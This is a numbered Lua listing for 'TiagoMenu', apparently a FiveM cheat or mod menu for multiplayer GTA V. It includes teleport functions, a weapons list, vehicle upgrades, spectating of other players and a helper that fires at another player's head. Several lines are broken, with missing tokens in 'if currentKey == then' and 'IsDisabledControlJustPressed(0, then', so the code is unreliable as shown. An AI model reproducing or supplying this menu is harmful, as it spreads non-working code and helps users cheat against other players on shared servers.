  4173. menus[currentMenu].aboutToBeClosed = false
  4174. setMenuVisible(currentMenu, false)
  4175. debugPrint(tostring(currentMenu) .. " menu closed")
  4176. PlaySoundFrontend(-1, "QUIT", "HUD_FRONTEND_DEFAULT_SOUNDSET", true)
  4177. optionCount = 0
  4178. currentMenu = nil
  4179. currentKey = nil
  4180. else
  4181. menus[currentMenu].aboutToBeClosed = true
  4182. debugPrint(tostring(currentMenu) .. " menu about to be closed")
  4183. end
  4184. end
  4185. end
  4187. function TiagoMenu.Button(text, subText)
  4188. local buttonText = text
  4189. if subText then
  4190. buttonText = "{ " .. tostring(buttonText) .. ", " .. tostring(subText) .. " }"
  4191. end
  4193. if menus[currentMenu] then
  4194. optionCount = optionCount + 1
  4196. local isCurrent = menus[currentMenu].currentOption == optionCount
  4198. drawButton(text, subText)
  4200. if isCurrent then
  4201. if currentKey == then
  4202. PlaySoundFrontend(-1, menus[currentMenu], menus[currentMenu].buttonPressedSound.set, true)
  4203. debugPrint(buttonText .. " button pressed")
  4204. return true
  4205. elseif currentKey == keys.left or currentKey == keys.right then
  4206. PlaySoundFrontend(-1, "NAV_UP_DOWN", "HUD_FRONTEND_DEFAULT_SOUNDSET", true)
  4207. end
  4208. end
  4210. return false
  4211. else
  4212. debugPrint("Failed to create " .. buttonText .. " button: " .. tostring(currentMenu) .. " menu doesn't exist")
  4214. return false
  4215. end
  4216. end
  4218. function TiagoMenu.MenuButton(text, id)
  4219. if menus[id] then
  4220. if TiagoMenu.Button(text) then
  4221. setMenuVisible(currentMenu, false)
  4222. setMenuVisible(id, true, true)
  4224. return true
  4225. end
  4226. else
  4227. debugPrint("Failed to create " .. tostring(text) .. " menu button: " .. tostring(id) .. " submenu doesn't exist")
  4228. end
  4230. return false
  4231. end
  4233. function TiagoMenu.CheckBox(text, bool, callback)
  4234. local checked = "~r~~h~Off"
  4235. if bool then
  4236. checked = "~g~~h~On"
  4237. end
  4239. if TiagoMenu.Button(text, checked) then
  4240. bool = not bool
  4241. debugPrint(tostring(text) .. " checkbox changed to " .. tostring(bool))
  4242. callback(bool)
  4244. return true
  4245. end
  4247. return false
  4248. end
  4250. function ch(C,x,y)
  4251. SetTextFont(0)
  4252. SetTextProportional(1)
  4253. SetTextScale(0.0,0.4)
  4254. SetTextDropshadow(1,0,0,0,255)
  4255. SetTextEdge(1,0,0,0,255)
  4256. SetTextDropShadow()
  4257. SetTextOutline()
  4258. SetTextEntry("STRING")
  4259. AddTextComponentString(C)
  4260. DrawText(x,y)
  4261. end
  4263. function TiagoMenu.ComboBox(text, items, currentIndex, selectedIndex, callback)
  4264. local itemsCount = #items
  4265. local selectedItem = items[currentIndex]
  4266. local isCurrent = menus[currentMenu].currentOption == (optionCount + 1)
  4268. if itemsCount > 1 and isCurrent then
  4269. selectedItem = "← " .. tostring(selectedItem) .. " →"
  4270. end
  4272. if TiagoMenu.Button(text, selectedItem) then
  4273. selectedIndex = currentIndex
  4274. callback(currentIndex, selectedIndex)
  4275. return true
  4276. elseif isCurrent then
  4277. if currentKey == keys.left then
  4278. if currentIndex > 1 then
  4279. currentIndex = currentIndex - 1
  4280. else
  4281. currentIndex = itemsCount
  4282. end
  4283. elseif currentKey == keys.right then
  4284. if currentIndex < itemsCount then
  4285. currentIndex = currentIndex + 1
  4286. else
  4287. currentIndex = 1
  4288. end
  4289. end
  4290. else
  4291. currentIndex = selectedIndex
  4292. end
  4294. callback(currentIndex, selectedIndex)
  4295. return false
  4296. end
  4298. function TiagoMenu.Display()
  4299. if isMenuVisible(currentMenu) then
  4300. if menus[currentMenu].aboutToBeClosed then
  4301. TiagoMenu.CloseMenu()
  4302. else
  4303. ClearAllHelpMessages()
  4305. drawTitle()
  4306. drawSubTitle()
  4308. currentKey = nil
  4310. if IsDisabledControlJustPressed(0, keys.down) then
  4311. PlaySoundFrontend(-1, "PIN_BUTTON", "ATM_SOUNDS", true) --down
  4313. if menus[currentMenu].currentOption < optionCount then
  4314. menus[currentMenu].currentOption = menus[currentMenu].currentOption + 1
  4315. else
  4316. menus[currentMenu].currentOption = 1
  4317. end
  4318. elseif IsDisabledControlJustPressed(0, keys.up) then
  4319. PlaySoundFrontend(-1, "PIN_BUTTON", "ATM_SOUNDS", true) --up
  4321. if menus[currentMenu].currentOption > 1 then
  4322. menus[currentMenu].currentOption = menus[currentMenu].currentOption - 1
  4323. else
  4324. menus[currentMenu].currentOption = optionCount
  4325. end
  4326. elseif IsDisabledControlJustPressed(0, keys.left) then
  4327. currentKey = keys.left
  4328. elseif IsDisabledControlJustPressed(0, keys.right) then
  4329. currentKey = keys.right
  4330. elseif IsDisabledControlJustPressed(0, then
  4331. currentKey =
  4332. elseif IsDisabledControlJustPressed(0, keys.back) then
  4333. if menus[menus[currentMenu].previousMenu] then
  4334. PlaySoundFrontend(-1, "Pin_Bad", "DLC_HEIST_BIOLAB_PREP_HACKING_SOUNDS", true) --back
  4335. setMenuVisible(menus[currentMenu].previousMenu, true)
  4336. else
  4337. TiagoMenu.CloseMenu()
  4338. end
  4339. end
  4341. optionCount = 0
  4342. end
  4343. end
  4344. end
  4346. function TiagoMenu.SetMenuWidth(id, width)
  4347. setMenuProperty(id, "width", width)
  4348. end
  4350. function TiagoMenu.SetMenuX(id, x)
  4351. setMenuProperty(id, "x", x)
  4352. end
  4354. function TiagoMenu.SetMenuY(id, y)
  4355. setMenuProperty(id, "y", y)
  4356. end
  4358. function TiagoMenu.SetMenuMaxOptionCountOnScreen(id, count)
  4359. setMenuProperty(id, "maxOptionCount", count)
  4360. end
  4362. function TiagoMenu.SetTitleColor(id, r, g, b, a)
  4363. setMenuProperty(id, "titleColor", {["r"] = r, ["g"] = g, ["b"] = b, ["a"] = a or menus[id].titleColor.a})
  4364. end
  4366. function TiagoMenu.SetTitleBackgroundColor(id, r, g, b, a)
  4367. setMenuProperty(
  4368. id,
  4369. "titleBackgroundColor",
  4370. {["r"] = r, ["g"] = g, ["b"] = b, ["a"] = a or menus[id].titleBackgroundColor.a}
  4371. )
  4372. end
  4374. function TiagoMenu.SetTitleBackgroundSprite(id, textureDict, textureName)
  4375. setMenuProperty(id, "titleBackgroundSprite", {dict = textureDict, name = textureName})
  4376. end
  4378. function TiagoMenu.SetSubTitle(id, text)
  4379. setMenuProperty(id, "subTitle", string.upper(text))
  4380. end
  4382. function TiagoMenu.SetMenuBackgroundColor(id, r, g, b, a)
  4383. setMenuProperty(
  4384. id,
  4385. "menuBackgroundColor",
  4386. {["r"] = r, ["g"] = g, ["b"] = b, ["a"] = a or menus[id].menuBackgroundColor.a}
  4387. )
  4388. end
  4390. function TiagoMenu.SetMenuTextColor(id, r, g, b, a)
  4391. setMenuProperty(id, "menuTextColor", {["r"] = r, ["g"] = g, ["b"] = b, ["a"] = a or menus[id].menuTextColor.a})
  4392. end
  4394. function TiagoMenu.SetMenuSubTextColor(id, r, g, b, a)
  4395. setMenuProperty(id, "menuSubTextColor", {["r"] = r, ["g"] = g, ["b"] = b, ["a"] = a or menus[id].menuSubTextColor.a})
  4396. end
  4398. function TiagoMenu.SetMenuFocusColor(id, r, g, b, a)
  4399. setMenuProperty(id, "menuFocusColor", {["r"] = r, ["g"] = g, ["b"] = b, ["a"] = a or menus[id].menuFocusColor.a})
  4400. end
  4402. function TiagoMenu.SetMenuButtonPressedSound(id, name, set)
  4403. setMenuProperty(id, "buttonPressedSound", {["name"] = name, ["set"] = set})
  4404. end
  4406. function KeyboardInput(TextEntry, ExampleText, MaxStringLength)
  4407. AddTextEntry("FMMC_KEY_TIP1", TextEntry .. ":")
  4408. DisplayOnscreenKeyboard(1, "FMMC_KEY_TIP1", "", ExampleText, "", "", "", MaxStringLength)
  4409. blockinput = true
  4411. while UpdateOnscreenKeyboard() ~= 1 and UpdateOnscreenKeyboard() ~= 2 do
  4412. Citizen.Wait(0)
  4413. end
  4415. if UpdateOnscreenKeyboard() ~= 2 then
  4416. local result = GetOnscreenKeyboardResult()
  4417. Citizen.Wait(500)
  4418. blockinput = false
  4419. return result
  4420. else
  4421. Citizen.Wait(500)
  4422. blockinput = false
  4423. return nil
  4424. end
  4425. end
  4427. local function getPlayerIds()
  4428. local players = {}
  4429. for i = 0, GetNumberOfPlayers(128) do
  4430. if NetworkIsPlayerActive(i) then
  4431. players[#players + 1] = i
  4432. end
  4433. end
  4434. return players
  4435. end
  4438. function DrawText3D(x, y, z, text, r, g, b)
  4439. SetDrawOrigin(x, y, z, 0)
  4440. SetTextFont(0)
  4441. SetTextProportional(0)
  4442. SetTextScale(0.0, 0.20)
  4443. SetTextColour(r, g, b, 255)
  4444. SetTextDropshadow(0, 0, 0, 0, 255)
  4445. SetTextEdge(2, 0, 0, 0, 150)
  4446. SetTextDropShadow()
  4447. SetTextOutline()
  4448. SetTextEntry("STRING")
  4449. SetTextCentre(1)
  4450. AddTextComponentString(text)
  4451. DrawText(0.0, 0.0)
  4452. ClearDrawOrigin()
  4453. end
  4455. function math.round(num, numDecimalPlaces)
  4456. return tonumber(string.format("%." .. (numDecimalPlaces or 0) .. "f", num))
  4457. end
  4459. local function RGBRainbow(frequency)
  4460. local result = {}
  4461. local curtime = GetGameTimer() / 1000
  4463. result.r = math.floor(math.sin(curtime * frequency + 0) * 127 + 128)
  4464. result.g = math.floor(math.sin(curtime * frequency + 2) * 127 + 128)
  4465. result.b = math.floor(math.sin(curtime * frequency + 4) * 127 + 128)
  4467. return result
  4468. end
  4470. function drawNotification(text)
  4471. SetNotificationTextEntry("STRING")
  4472. AddTextComponentString(text)
  4473. DrawNotification(false, false)
  4474. end
  4478. local allWeapons = {
  4479. "WEAPON_KNIFE",
  4482. "WEAPON_HAMMER",
  4483. "WEAPON_BAT",
  4486. "WEAPON_BOTTLE",
  4487. "WEAPON_DAGGER",
  4492. "WEAPON_PISTOL",
  4493. "WEAPON_PISTOL_MK2",
  4496. "WEAPON_PISTOL50",
  4505. "WEAPON_SMG",
  4506. "WEAPON_SMG_MK2",
  4508. "WEAPON_MG",
  4526. "WEAPON_MUSKET",
  4535. "WEAPON_RPG",
  4542. "WEAPON_BZGAS",
  4548. "WEAPON_FLARE",
  4549. "WEAPON_BALL"
  4550. }
  4552. local Enabled = true
  4553. local Collision = true
  4555. function TeleportToCoords()
  4556. local x = KeyboardInput("Enter X Pos", "", 100)
  4557. local y = KeyboardInput("Enter Y Pos", "", 100)
  4558. local z = KeyboardInput("Enter Z Pos", "", 100)
  4559. local entity
  4560. if x ~= "" and y ~= "" and z ~= "" then
  4561. if IsPedInAnyVehicle(GetPlayerPed(-1),0) and GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1),0),-1)==GetPlayerPed(-1) then
  4562. entity = GetVehiclePedIsIn(GetPlayerPed(-1),0)
  4563. else
  4564. entity = PlayerPedId()
  4565. end
  4566. if entity then
  4567. SetEntityCoords(entity, x + 0.5, y + 0.5, z + 0.5, 1,0,0,1)
  4568. end
  4569. else
  4570. drawNotification("~g~Invalid Coords!")
  4571. end
  4572. end
  4574. local function LSPD()
  4575. local bB = 436.873
  4576. local bC = -987.138
  4577. local bD = 30.69
  4578. if bB ~= '' and bC ~= '' and bD ~= '' then
  4579. if
  4580. IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
  4581. GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1)
  4582. then
  4583. entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
  4584. else
  4585. entity = GetPlayerPed(-1)
  4586. end
  4587. if entity then
  4588. SetEntityCoords(entity, bB + 0.5, bC + 0.5, bD + 0.5, 1, 0, 0, 1)
  4589. end
  4590. end
  4592. end
  4594. local function fbi()
  4595. local bB = 160.868
  4596. local bC = -745.831
  4597. local bD = 250.063
  4598. if bB ~= '' and bC ~= '' and bD ~= '' then
  4599. if
  4600. IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
  4601. GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1)
  4602. then
  4603. entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
  4604. else
  4605. entity = GetPlayerPed(-1)
  4606. end
  4607. if entity then
  4608. SetEntityCoords(entity, bB + 0.5, bC + 0.5, bD + 0.5, 1, 0, 0, 1)
  4609. end
  4610. end
  4612. end
  4614. local function ls()
  4615. local bB = -365.425
  4616. local bC = -131.809
  4617. local bD = 37.873
  4618. if bB ~= '' and bC ~= '' and bD ~= '' then
  4619. if
  4620. IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
  4621. GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1)
  4622. then
  4623. entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
  4624. else
  4625. entity = GetPlayerPed(-1)
  4626. end
  4627. if entity then
  4628. SetEntityCoords(entity, bB + 0.5, bC + 0.5, bD + 0.5, 1, 0, 0, 1)
  4629. end
  4630. end
  4632. end
  4634. local function gp()
  4635. local bB = 266.12
  4636. local bC = -752.51
  4637. local bD = 34.64
  4638. if bB ~= '' and bC ~= '' and bD ~= '' then
  4639. if
  4640. IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
  4641. GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1)
  4642. then
  4643. entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
  4644. else
  4645. entity = GetPlayerPed(-1)
  4646. end
  4647. if entity then
  4648. SetEntityCoords(entity, bB + 0.5, bC + 0.5, bD + 0.5, 1, 0, 0, 1)
  4649. end
  4650. end
  4652. end
  4654. local function dealership()
  4655. local bB = -15.32
  4656. local bC = -1080.69
  4657. local bD = 26.14
  4658. if bB ~= '' and bC ~= '' and bD ~= '' then
  4659. if
  4660. IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
  4661. GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1)
  4662. then
  4663. entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
  4664. else
  4665. entity = GetPlayerPed(-1)
  4666. end
  4667. if entity then
  4668. SetEntityCoords(entity, bB + 0.5, bC + 0.5, bD + 0.5, 1, 0, 0, 1)
  4669. end
  4670. end
  4672. end
  4674. local function Ammunation()
  4675. local bB = 19.22
  4676. local bC = -1108.71
  4677. local bD = 29.8
  4678. if bB ~= '' and bC ~= '' and bD ~= '' then
  4679. if
  4680. IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
  4681. GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1)
  4682. then
  4683. entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
  4684. else
  4685. entity = GetPlayerPed(-1)
  4686. end
  4687. if entity then
  4688. SetEntityCoords(entity, bB + 0.5, bC + 0.5, bD + 0.5, 1, 0, 0, 1)
  4689. end
  4690. end
  4692. end
  4694. local function shopclothes()
  4695. local bB = 428.61
  4696. local bC = -799.89
  4697. local bD = 29.49
  4698. if bB ~= '' and bC ~= '' and bD ~= '' then
  4699. if
  4700. IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
  4701. GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1)
  4702. then
  4703. entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
  4704. else
  4705. entity = GetPlayerPed(-1)
  4706. end
  4707. if entity then
  4708. SetEntityCoords(entity, bB + 0.5, bC + 0.5, bD + 0.5, 1, 0, 0, 1)
  4709. end
  4710. end
  4712. end
  4714. local function barber()
  4715. local bB = -32.84
  4716. local bC = -152.34
  4717. local bD = 57.08
  4718. if bB ~= '' and bC ~= '' and bD ~= '' then
  4719. if
  4720. IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
  4721. GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1)
  4722. then
  4723. entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
  4724. else
  4725. entity = GetPlayerPed(-1)
  4726. end
  4727. if entity then
  4728. SetEntityCoords(entity, bB + 0.5, bC + 0.5, bD + 0.5, 1, 0, 0, 1)
  4729. end
  4730. end
  4732. end
  4734. local function MichaelHouse()
  4735. local bB = -801.847
  4736. local bC = 175.266
  4737. local bD = 72.845
  4738. if bB ~= '' and bC ~= '' and bD ~= '' then
  4739. if
  4740. IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
  4741. GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1)
  4742. then
  4743. entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
  4744. else
  4745. entity = GetPlayerPed(-1)
  4746. end
  4747. if entity then
  4748. SetEntityCoords(entity, bB + 0.5, bC + 0.5, bD + 0.5, 1, 0, 0, 1)
  4749. end
  4750. end
  4752. end
  4754. local function trevor()
  4755. local bB = 1972.972
  4756. local bC = 3816.498
  4757. local bD = 32.95
  4758. if bB ~= '' and bC ~= '' and bD ~= '' then
  4759. if
  4760. IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
  4761. GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1)
  4762. then
  4763. entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
  4764. else
  4765. entity = GetPlayerPed(-1)
  4766. end
  4767. if entity then
  4768. SetEntityCoords(entity, bB + 0.5, bC + 0.5, bD + 0.5, 1, 0, 0, 1)
  4769. end
  4770. end
  4772. end
  4774. local function spot()
  4775. local bB = 497.76
  4776. local bC = -1334.01
  4777. local bD = 29.33
  4778. if bB ~= '' and bC ~= '' and bD ~= '' then
  4779. if
  4780. IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
  4781. GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1)
  4782. then
  4783. entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
  4784. else
  4785. entity = GetPlayerPed(-1)
  4786. end
  4787. if entity then
  4788. SetEntityCoords(entity, bB + 0.5, bC + 0.5, bD + 0.5, 1, 0, 0, 1)
  4789. end
  4790. end
  4792. end
  4794. local function MazeBank()
  4795. local bB = -75.015
  4796. local bC = -818.215
  4797. local bD = 326.176
  4798. if bB ~= '' and bC ~= '' and bD ~= '' then
  4799. if
  4800. IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
  4801. GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1)
  4802. then
  4803. entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
  4804. else
  4805. entity = GetPlayerPed(-1)
  4806. end
  4807. if entity then
  4808. SetEntityCoords(entity, bB + 0.5, bC + 0.5, bD + 0.5, 1, 0, 0, 1)
  4809. end
  4810. end
  4812. end
  4814. local function TeleportToWaypoint()
  4815. if DoesBlipExist(GetFirstBlipInfoId(8)) then
  4816. local blipIterator = GetBlipInfoIdIterator(8)
  4817. local blip = GetFirstBlipInfoId(8, blipIterator)
  4818. WaypointCoords = Citizen.InvokeNative(0xFA7C7F0AADF25D09, blip, Citizen.ResultAsVector()) --Thanks To Briglair []
  4819. wp = true
  4820. else
  4821. drawNotification("~r~No waypoint!")
  4822. end
  4824. local zHeigt = 0.0
  4825. height = 1000.0
  4826. while true do
  4827. Citizen.Wait(0)
  4828. if wp then
  4829. if
  4830. IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
  4831. (GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1))
  4832. then
  4833. entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
  4834. else
  4835. entity = GetPlayerPed(-1)
  4836. end
  4838. SetEntityCoords(entity, WaypointCoords.x, WaypointCoords.y, height)
  4839. FreezeEntityPosition(entity, true)
  4840. local Pos = GetEntityCoords(entity, true)
  4842. if zHeigt == 0.0 then
  4843. height = height - 25.0
  4844. SetEntityCoords(entity, Pos.x, Pos.y, height)
  4845. bool, zHeigt = GetGroundZFor_3dCoord(Pos.x, Pos.y, Pos.z, 0)
  4846. else
  4847. SetEntityCoords(entity, Pos.x, Pos.y, zHeigt)
  4848. FreezeEntityPosition(entity, false)
  4849. wp = false
  4850. height = 1000.0
  4851. zHeigt = 0.0
  4852. drawNotification("~g~Teleported to waypoint!")
  4853. break
  4854. end
  4855. end
  4856. end
  4857. end
  4859. function stringsplit(inputstr, sep)
  4860. if sep == nil then
  4861. sep = "%s"
  4862. end
  4863. local t = {}
  4864. i = 1
  4865. for str in string.gmatch(inputstr, "([^" .. sep .. "]+)") do
  4866. t[i] = str
  4867. i = i + 1
  4868. end
  4869. return t
  4870. end
  4872. local Spectating = false
  4874. function SpectatePlayer(player)
  4875. local playerPed = PlayerPedId()
  4876. Spectating = not Spectating
  4877. local targetPed = GetPlayerPed(player)
  4879. if (Spectating) then
  4880. local targetx, targety, targetz = table.unpack(GetEntityCoords(targetPed, false))
  4882. RequestCollisionAtCoord(targetx, targety, targetz)
  4883. NetworkSetInSpectatorMode(true, targetPed)
  4885. drawNotification("Spectating " .. GetPlayerName(player))
  4886. else
  4887. local targetx, targety, targetz = table.unpack(GetEntityCoords(targetPed, false))
  4889. RequestCollisionAtCoord(targetx, targety, targetz)
  4890. NetworkSetInSpectatorMode(false, targetPed)
  4892. drawNotification("Stopped Spectating " .. GetPlayerName(player))
  4893. end
  4894. end
  4897. function ShootPlayer(player)
  4898. local head = GetPedBoneCoords(player, GetEntityBoneIndexByName(player, "SKEL_HEAD"), 0.0, 0.0, 0.0)
  4899. SetPedShootsAtCoord(PlayerPedId(), head.x, head.y, head.z, true)
  4900. end
  4902. function MaxOut(veh)
  4903. SetVehicleModKit(GetVehiclePedIsIn(GetPlayerPed(-1), false), 0)
  4904. SetVehicleWheelType(GetVehiclePedIsIn(GetPlayerPed(-1), false), 7)
  4905. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 0, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 0) - 1, false)
  4906. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 1, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 1) - 1, false)
  4907. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 2, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 2) - 1, false)
  4908. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 3, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 3) - 1, false)
  4909. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 4, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 4) - 1, false)
  4910. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 5, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 5) - 1, false)
  4911. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 6, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 6) - 1, false)
  4912. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 7, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 7) - 1, false)
  4913. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 8, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 8) - 1, false)
  4914. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 9, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 9) - 1, false)
  4915. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 10, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 10) - 1, false)
  4916. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 11, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 11) - 1, false)
  4917. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 12, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 12) - 1, false)
  4918. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 13, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 13) - 1, false)
  4919. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 14, 16, false)
  4920. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 15, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 15) - 2, false)
  4921. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 16, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 16) - 1, false)
  4922. ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 17, true)
  4923. ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 18, true)
  4924. ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 19, true)
  4925. ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 20, true)
  4926. ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 21, true)
  4927. ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 22, true)
  4928. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 23, 1, false)
  4929. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 24, 1, false)
  4930. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 25, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 25) - 1, false)
  4931. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 27, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 27) - 1, false)
  4932. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 28, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 28) - 1, false)
  4933. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 30, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 30) - 1, false)
  4934. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 33, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 33) - 1, false)
  4935. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 34, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 34) - 1, false)
  4936. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 35, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 35) - 1, false)
  4937. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 38, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 38) - 1, true)
  4938. SetVehicleWindowTint(GetVehiclePedIsIn(GetPlayerPed(-1), false), 1)
  4939. SetVehicleTyresCanBurst(GetVehiclePedIsIn(GetPlayerPed(-1), false), false)
  4940. SetVehicleNumberPlateTextIndex(GetVehiclePedIsIn(GetPlayerPed(-1), false), 5)
  4941. end
  4942. function engine(veh)
  4943. SetVehicleModKit(GetVehiclePedIsIn(GetPlayerPed(-1), false), 0)
  4944. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 11, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 11) - 1, false)
  4945. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 12, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 12) - 1, false)
  4946. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 13, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 13) - 1, false)
  4947. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 15, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 15) - 2, false)
  4948. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 16, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 16) - 1, false)
  4949. ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 17, true)
  4950. ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 18, true)
  4951. ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 19, true)
  4952. ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 21, true)
  4953. SetVehicleTyresCanBurst(GetVehiclePedIsIn(GetPlayerPed(-1), false), false)
  4954. end
  4956. function engine1(veh)
  4957. SetVehicleModKit(GetVehiclePedIsIn(GetPlayerPed(-1), false), 0)
  4958. SetVehicleWheelType(GetVehiclePedIsIn(GetPlayerPed(-1), false), 7)
  4959. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 0, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 0) - 1, false)
  4960. SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 1, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 1) - 1, false)
